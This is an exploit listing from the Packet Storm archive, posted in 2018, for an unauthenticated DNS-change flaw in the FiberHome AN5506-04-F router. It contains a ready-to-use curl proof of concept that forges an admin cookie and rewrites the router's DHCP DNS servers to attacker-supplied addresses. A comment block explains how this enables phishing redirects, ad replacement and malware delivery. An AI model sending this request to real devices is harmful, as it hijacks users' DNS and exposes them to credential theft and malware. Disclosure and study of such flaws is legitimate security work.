Twenty Year Anniversary

FiberHome AN5506 Unauthenticated Remote DNS Change

FiberHome AN5506 Unauthenticated Remote DNS Change
Posted Feb 3, 2018
Authored by r0ots3c

FiberHome AN5506 unauthenticated remote DNS changing exploit.

tags | exploit, remote
MD5 | 3eee24b6a1de2b9a08be8b8756a9e526

FiberHome AN5506 Unauthenticated Remote DNS Change

Change Mirror Download
#  FIBERHOME AN5506 Unauthenticated Remote DNS Change Vulnerability
#
# Software Version RP2617
# Device Model AN5506-04-F
# Vendor Homepage: www.fiberhome.com/
#
#
# Date: 01/02/2018
# Exploit Author: r0ots3c
# http://wandoelmo.com.br
# https://www.facebook.com/wsec.info
#
# Description:
# Vulnerability exists in web interface
# This router has vulnerabilities where you can get information or edit
configurations in an unauthenticated way.
# The biggest risk is the possibility of changing the dns of the device.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
#

Proof of Concept:

VIA CURL:
curl 'http://<TARGET>/goform/setDhcp' -H 'Cookie: loginName=admin' -H
--data
'dhcpType=1&dhcprelay_ip=&dhcpStart=192.168.1.2&dhcpEnd=192.168.1.254&dhcpMask=255.255.255.0&dhcpPriDns=<MALICIOUS
DNS1>dhcpSecDns=<MALICIOUS
DNS2>&dhcpGateway=192.168.1.1&dhcptime=24&dhcptime_m=0&option_60enable_s=0&option_125enable_s=0&option125_text='
--compressed -k -i


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

May 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    17 Files
  • 3
    May 3rd
    30 Files
  • 4
    May 4th
    29 Files
  • 5
    May 5th
    2 Files
  • 6
    May 6th
    3 Files
  • 7
    May 7th
    13 Files
  • 8
    May 8th
    27 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    15 Files
  • 11
    May 11th
    8 Files
  • 12
    May 12th
    2 Files
  • 13
    May 13th
    8 Files
  • 14
    May 14th
    7 Files
  • 15
    May 15th
    43 Files
  • 16
    May 16th
    19 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    3 Files
  • 20
    May 20th
    6 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    8 Files
  • 23
    May 23rd
    53 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close